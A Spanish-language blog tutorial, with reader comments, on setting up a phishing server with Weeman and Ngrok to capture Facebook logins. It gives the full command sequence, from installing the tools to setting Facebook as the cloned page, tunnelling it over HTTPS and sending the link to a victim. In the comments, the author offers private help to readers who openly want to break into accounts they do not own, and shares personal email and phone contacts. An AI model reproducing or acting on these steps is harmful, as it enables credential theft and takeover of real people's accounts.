Weeman y Ngrok son las mejores herramienta para realizar ataques de phishing actualmente. Crea tu propio servidor de phishing para hackear cuentas de Facebook u otra red social.
Con Weeman podemos tener un servidor HTTP para phishing en Python, además tiene soporte para la mayoría de los sitios web (los más grandes). Por su lado, ngrok garantiza la creación de túneles seguros a un servidor local.
Anteriormente, publiqué una entrada sobre cómo hackear Facebook con Phishing. Dicho método es muy sencillo y a la vez difícil de dar resultados por ser muy predecible. Ahora veremos otra situación, que con algunos ajustes, las probabilidades de tener éxito aumentan considerablemente.
1. Weeman y Ngrok
- Primero descargamos y extraemos Ngrok
Una vez extraído, copiamos el archivo a la carpeta de binarios /usr/bin para ejecutarlo posteriormente.
sudo cp /ruta/ngrok /usr/bin
Descargar y extraer Ngrok
- Descargamos Weeman desde github
git clone https://github.com/samyoyo/weeman.git- Para iniciar Weeman, abra la terminal y ejecute los siguientes comandos:
cd weeman
chmod +x weeman.py
python weeman.py
show
Descargar e iniciar Weeman
2. Hackear Facebook con Phishing
- Inicie Weeman con el comando show:
Comando show en Weeman
- Una vez ejecutado weeman, abra una nueva terminal y ejecute ngrok
ngrok http 8080- Ahora en la terminal con Weeman abierto, ejecute los siguientes comandos:
set url https://facebook.com
set action_url xxx_ngrok.io
set port 8080
run
Comandos Set y run
Por supuesto, xxx_ngrok.io es la URL generada al ejecutar Ngrok anteriormente, ese enlace le servirá como sitio web de Phishing.
- La URL generada por Ngrok se encuentra en HTTP, para utilizar HTTPS escriba el siguiente comando al ejecutar Ngrok:
ngrok http -bind-tls=true 8080
Phishing HTTPS con Ngrok
Por último, envíe la URL a la víctima y espere a que abra ese enlace e inicie sesión con sus credenciales.
Captura de credenciales de Facebook
3. Tutorial: Crear un servidor Phishing
Consulte el tutorial paso a paso para una mejor comprensión de cómo crear un servidor phishing para, por ejemplo, capturar el usuario y contraseña de una cuenta de Facebook.
¡SOLO UTILICE CON FINES EDUCATIVOS! ¡Si te ha gustado el artículo, no dudes en compartirlo con los demás 😉 !
al intentar ejecuar ngrok me sale permiso denegado
Hola, qué distribución usas y que comando ejecutaste?
al hacer todos los prosesos, copio el link en el navegador y me sale la pagina de apache2 del servidor ?
como edito /var/www/html/index.html antes. te lo agradesco de ante mano espero me puedas ayudar
Hola, elimina el archivo index.html
Hola que sistema operativo usan ?
Kali Linux
Hola. Necesito tu ayuda. Donde te puedo encontrar ?
Hola que tal Noemi!
Vía correo: alexynior15@gmail.com o Telegram/WhatsApp: +51927742190
Necesito ayuda
En qué te puedo ayudar Dana?
oye amigo quiero hackear una cuenta que no me se la contraseña. ayudame
¿Cuál es el problema con el programa?
Hola porque cuando creo un ngrok ahora solo me sale que el tunel esta caido? Hace unos dias me funcionaba bien
¿Alguna captura amigo?
Te la envie por WhatsApp
Te respondí 👍
amigo tengo un problema aparece lo siguiente ./ngrok: no se puede ejecutar fichero binario: Formato de ejecutable incorrecto
que debo hacer en ese caso sera que me puedes explicar
Hola, realiza lo siguiente:
Localiza tu archivo ngrok y ejecuta lo siguiente:
sudo cp ngrok /usr/local/binEso hace que puedas ejecutar el comando desde cualquier ubicación..
aparece lo mismo me das tu correo para contactarte
Telegram o Whatsapp: +51927742190
esta funcionando??
Aún no
se puede con windows 7???
Weeman no tiene soporte para Windows :/
Hola amigo, te puedo preguntar algo por interno ?
Claro, escríbeme a la fanpage
hola alguien me puede explicar con mas detalle ps lo hago y me sale una url local y tengo una cuenta en ngrok pero cuando lo inicio se queda en reconecting y no pasa de ahi al correo josearleyreyesferrera@gmail.com
Hola Jose, puedes intentar alguna de estas soluciones.
y luego de hacer el proceso como obtengo los datos?
Se captarán y mostrarán en pantalla
Te escribi a tu ws pero no te llega amigo
Estoy sin WhatsApp :/ puede ser Telegram?